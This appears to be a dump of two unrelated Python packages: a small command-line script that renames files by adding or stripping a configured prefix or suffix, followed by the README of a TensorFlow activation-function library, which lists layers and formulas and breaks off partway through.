# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import configparser
import os
from optparse import OptionParser
import pkg_resources
def rreplace(s, old, new, occurrence):
li = s.rsplit(old, occurrence)
return new.join(li)
def main():
configFilename = pkg_resources.resource_filename(__name__, "actDeact.conf")
config = configparser.ConfigParser()
config.read(configFilename)
prefix = ""
suffix = ""
if 'prefix' in config['Main']:
prefix = config['Main']['prefix']
if 'suffix' in config['Main']:
suffix = config['Main']['suffix']
parser = OptionParser(usage="usage: %prog [options] args" ,version="%prog 1.0")
parser.add_option("-a", "--activate", action="store_true", dest="activate", default=False, help="Activate file(s)")
parser.add_option("-d", "--deactivate", action="store_true", dest="deactivate", default=False, help="Deactivate file(s)")
parser.add_option("-c", "--config", action="store_true", dest="config", default=False, help="Show the filename of the config file for editing")
parser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False, help="Verbose output")
(options, args) = parser.parse_args()
if options.activate and options.deactivate:
parser.error('options -a and -d are mutually exclusive')
if options.config:
print(configFilename)
if options.deactivate:
for arg in args:
if options.verbose:
print("Deactivating: " , arg , " to ", prefix + arg + suffix)
try:
os.rename(arg, prefix + arg + suffix)
except:
if options.verbose:
print("Error renaming: ", arg)
if options.activate:
for arg in args:
newname = arg
if prefix != "":
newname = newname.replace(prefix , "", 1)
if suffix != "":
newname = rreplace(newname, suffix, "", 1)
if options.verbose:
print("Activating: " , arg , " to ", newname)
try:
os.rename(arg, newname)
except:
if options.verbose:
print("Error renaming: ", arg) | ActDeact | /ActDeact-1.0.0.tar.gz/ActDeact-1.0.0/actDeact/__init__.py | __init__.py |
<div align="center">
<img src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ActTensor%20logo.png"><br>
</div>
---------
# **ActTensor**: Activation Functions for TensorFlow
 
## **What is it?**
ActTensor is a Python package that provides state-of-the-art activation functions which facilitate using them in Deep Learning projects in an easy and fast manner.
## **Why not using tf.keras.activations?**
As you may know, TensorFlow only has a few defined activation functions and most importantly it does not include newly-introduced activation functions. Wrting another one requires time and energy; however, this package has most of the widely-used, and even state-of-the-art activation functions that are ready to use in your models.
## Requirements
numpy
tensorflow
setuptools
keras
wheel
## Where to get it?
The source code is currently hosted on GitHub at:
https://github.com/pouyaardehkhani/ActTensor
Binary installers for the latest released version are available at the [Python
Package Index (PyPI)](https://pypi.org/project/ActTensor-tf/)
```sh
# PyPI
pip install ActTensor-tf
```
## License
[MIT](LICENSE)
## How to use?
```sh
import tensorflow as tf
import numpy as np
from ActTensor_tf import ReLU # name of the layer
```
functional api
```sh
inputs = tf.keras.layers.Input(shape=(28,28))
x = tf.keras.layers.Flatten()(inputs)
x = tf.keras.layers.Dense(128)(x)
# wanted class name
x = ReLU()(x)
output = tf.keras.layers.Dense(10,activation='softmax')(x)
model = tf.keras.models.Model(inputs = inputs,outputs=output)
```
sequential api
```sh
model = tf.keras.models.Sequential([tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128),
# wanted class name
ReLU(),
tf.keras.layers.Dense(10, activation = tf.nn.softmax)])
```
NOTE:
> The main function of the activation layers are also availabe but it maybe defined as different name. Check [this](https://github.com/pouyaardehkhani/ActTensor/edit/master/README.md#activations) for more information.
```
from ActTensor_tf import relu
```
## Activations
Classes and Functions are available in ***ActTensor_tf***
| Activation Name | Class Name | Function Name |
| :---: | :---: | :---: |
| SoftShrink | [SoftShrink](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L8) | [softSHRINK](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L649) |
| HardShrink | [HardShrink](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L45) | [hard_shrink](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L7) |
| GLU | [GLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L82) | - |
| Bilinear | [Bilinear](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L99) | - |
| ReGLU | [ReGLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L115) | - |
| GeGLU | [GeGLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L132) | - |
| SwiGLU | [SwiGLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L149) | - |
| SeGLU | [SeGLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L166) | - |
| ReLU | [ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L182) | [relu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L23) |
| Identity | [Identity](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L199) | [identity](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L38) |
| Step | [Step](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L216) | [step](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L52) |
| Sigmoid | [Sigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L233) | [sigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L67) |
| HardSigmoid | [HardSigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L250) | [hard_sigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L81) |
| LogSigmoid | [LogSigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L267) | [log_sigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L95) |
| SiLU | [SiLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L284) | [silu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L109) |
| PLinear | [ParametricLinear](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L301) | [parametric_linear](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L123) |
| Piecewise-Linear | [PiecewiseLinear](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L323) | [piecewise_linear](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L139) |
| Complementary Log-Log | [CLL](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L349) | [cll](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L164) |
| Bipolar | [Bipolar](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L366) | [bipolar](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L178) |
| Bipolar-Sigmoid | [BipolarSigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L383) | [bipolar_sigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L193) |
| Tanh | [Tanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L400) | [tanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L207) |
| TanhShrink | [TanhShrink](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L417) | [tanhshrink](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L221) |
| LeCun's Tanh | [LeCunTanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L434) | [leCun_tanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L235) |
| HardTanh | [HardTanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L451) | [hard_tanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L253) |
| TanhExp | [TanhExp](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L468) | [tanh_exp](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L267) |
| Absolute | [ABS](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L485) | [Abs](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L281) |
| Squared-ReLU | [SquaredReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L502) | [squared_relu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L295) |
| P-ReLU | [ParametricReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L519) | [Parametric_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L310) |
| R-ReLU | [RandomizedReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L541) | [Randomized_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L326) |
| LeakyReLU | [LeakyReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L567) | [leaky_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L346) |
| ReLU6 | [ReLU6](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L584) | [relu6](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L361) |
| Mod-ReLU | [ModReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L601) | [Mod_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L375) |
| Cosine-ReLU | [CosReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L623) | [Cos_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L391) |
| Sin-ReLU | [SinReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L642) | [Sin_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L407) |
| Probit | [Probit](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L661) | [probit](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L423) |
| Cos | [Cos](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L678) | [Cosine](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L437) |
| Gaussian | [Gaussian](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L695) | [gaussian](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L451) |
| Multiquadratic | [Multiquadratic](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L712) | [Multi_quadratic](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L465) |
| Inverse-Multiquadratic | [InvMultiquadratic](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L742) | [Inv_Multi_quadratic](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L487) |
| SoftPlus | [SoftPlus](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L772) | [softPlus](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L509) |
| Mish | [Mish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L789) | [mish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L525) |
| SMish | [Smish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L806) | [smish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L539) |
| P-SMish | [ParametricSmish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L823) | [Parametric_Smish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L553) |
| Swish | [Swish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L853) | [swish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L577) |
| ESwish | [ESwish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L875) | [eswish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L592) |
| HardSwish | [HardSwish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L897) | [hardSwish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L607) |
| GCU | [GCU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L914) | [gcu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L621) |
| CoLU | [CoLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L931) | [colu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L635) |
| PELU | [PELU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L948) | [pelu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L667) |
| SELU | [SELU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L974) | [selu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L685) |
| CELU | [CELU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L991) | [celu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L701) |
| ArcTan | [ArcTan](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1013) | [arcTan](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L716) |
| Shifted-SoftPlus | [ShiftedSoftPlus](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1030) | [Shifted_SoftPlus](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L730) |
| Softmax | [Softmax](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1047) | [softmax](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L744) |
| Logit | [Logit](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1064) | [logit](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L758) |
| GELU | [GELU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1081) | [gelu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L772) |
| Softsign | [Softsign](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1098) | [softsign](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L786) |
| ELiSH | [ELiSH](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1115) | [elish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L800) |
| HardELiSH | [HardELiSH](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1132) | [hardELiSH](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L815) |
| Serf | [Serf](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1149) | [serf](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L830) |
| ELU | [ELU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1166) | [elu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L844) |
| Phish | [Phish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1188) | [phish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L860) |
| QReLU | [QReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1205) | [qrelu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L874) |
| MQReLU | [MQReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1222) | [mqrelu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L888) |
| FReLU | [FReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1239) | [frelu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L902) |
<div align="center">
<img src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Activation%20Functions.gif"><br>
</div>
## **Which activation functions it supports?**
1. Soft Shrink:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x-\lambda&space;&&space;x&space;>&space;\lambda\\&space;x+\lambda&space;&&space;x&space;<&space;-\lambda\\&space;0&space;&&space;otherwise&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SoftShrink.png">
</p>
2. Hard Shrink:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\begin{cases}x&space;&&space;x&space;>&space;\lambda\\&space;x&space;&&space;x&space;<&space;-\lambda\\&space;0&space;&&space;otherwise&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/HardShrink.png">
</p>
3. GLU:
<img src="https://latex.codecogs.com/svg.image?&space;GLU\left&space;(&space;a,b&space;&space;\right&space;)=&space;a&space;\oplus&space;\sigma&space;\left&space;(&space;b&space;\right&space;)">
<p align="center">
<img width="700" height="500" src="https://production-media.paperswithcode.com/methods/new_architecture_8UYjVkL.jpg">
</p>
* [Source Paper : Language Modeling with Gated Convolutional Networks](http://arxiv.org/abs/1612.08083v3)
4. Bilinear:
* [Source Paper : Parameter Efficient Deep Neural Networks with Bilinear Projections](https://arxiv.org/pdf/2011.01391)
5. ReGLU:
ReGLU is an activation function which is a variant of GLU.
<img src="https://latex.codecogs.com/svg.image?ReGLU\left&space;(&space;x,&space;W,&space;V,&space;b,&space;c&space;\right&space;)=&space;max(0,&space;xW&space;+&space;b)&space;\oplus&space;(xV&space;+&space;b)">
* [Source Paper : GLU Variants Improve Transformer](https://arxiv.org/abs/2002.05202v1)
6. GeGLU:
GeGLU is an activation function which is a variant of GLU.
<img src="https://latex.codecogs.com/svg.image?GeGLU\left&space;(&space;x,&space;W,&space;V,&space;b,&space;c&space;\right&space;)=&space;GELU(xW&space;+&space;b)&space;\oplus&space;(xV&space;+&space;b)">
* [Source Paper : GLU Variants Improve Transformer](https://arxiv.org/abs/2002.05202v1)
7. SwiGLU:
SwiGLU is an activation function which is a variant of GLU.
<img src="https://latex.codecogs.com/svg.image?SwiGLU\left&space;(&space;x,&space;W,&space;V,&space;b,&space;c&space;\right&space;)=&space;Swish_b(xW&space;+&space;b)&space;\oplus&space;(xV&space;+&space;b)">
* [Source Paper : GLU Variants Improve Transformer](https://arxiv.org/abs/2002.05202v1)
8. SeGLU:
SeGLU is an activation function which is a variant of GLU.
9. ReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;\geq&space;0\\0&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ReLU.png">
</p>
* [Source Paper : Nair, Vinod, and Geoffrey E. Hinton. "Rectified linear units improve restricted boltzmann machines." In Icml. 2010.](https://www.cs.toronto.edu/~fritz/absps/reluICML.pdf)
10. Identity:
$f(x) = x$
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Identity.png">
</p>
11. Step:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}1&space;&&space;x&space;<&space;0\\0&space;&&space;x&space;\geq&space;0\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Step.png">
</p>
12. Sigmoid:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{1}{1+e^{-x}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Sigmoid.png">
</p>
* [Source Paper : Han, Jun, and Claudio Moraga. "The influence of the sigmoid function parameters on the speed of backpropagation learning." In International workshop on artificial neural networks, pp. 195-201. Springer, Berlin, Heidelberg, 1995.](https://link.springer.com/chapter/10.1007/3-540-59497-3_175)
13. Hard Sigmoid:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;max(0,&space;min(1,\frac{x+1}{2}))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/HardSigmoid.png">
</p>
* [Source Paper : Courbariaux, Matthieu, Yoshua Bengio, and Jean-Pierre David. "Binaryconnect: Training deep neural networks with binary weights during propagations." Advances in neural information processing systems 28 (2015).](https://arxiv.org/abs/1511.00363)
14. Log Sigmoid:
<img src="https://latex.codecogs.com/svg.image?LogSigmoid(x)=\log\left(\dfrac{1}{1+\exp(-x_i)}\right)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/LogSigmoid.png">
</p>
15. SiLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x(\frac{1}{1+e^{-x}})">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SiLU.png">
</p>
* [Source Paper : Elfwing, Stefan, Eiji Uchibe, and Kenji Doya. "Sigmoid-weighted linear units for neural network function approximation in reinforcement learning." Neural Networks 107 (2018): 3-11.](https://arxiv.org/abs/1702.03118)
16. ParametricLinear:
$f(x) = a*x$
17. PiecewiseLinear:
Choose some xmin and xmax, which is our "range". Everything less than than this range will be 0, and everything greater than this range will be 1. Anything else is linearly-interpolated between.
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\begin{cases}0&space;&&space;x&space;<&space;x_{min}\\&space;mx&space;+&space;b&space;&&space;x_{min}&space;<&space;x&space;<&space;x_{max}\\&space;1&space;&&space;x&space;>&space;x_{xmax}&space;\end{cases}">
<img src="https://latex.codecogs.com/svg.image?m&space;=&space;\frac{1}{x_{max}&space;-&space;x_{min}}">
<img src="https://latex.codecogs.com/svg.image?b&space;=&space;-mx_{min}&space;=&space;1&space;-&space;mx_{max}">
<p align="center">
<img width="700" height="400" src="https://i.stack.imgur.com/cguIH.png">
</p>
18. Complementary Log-Log (CLL):
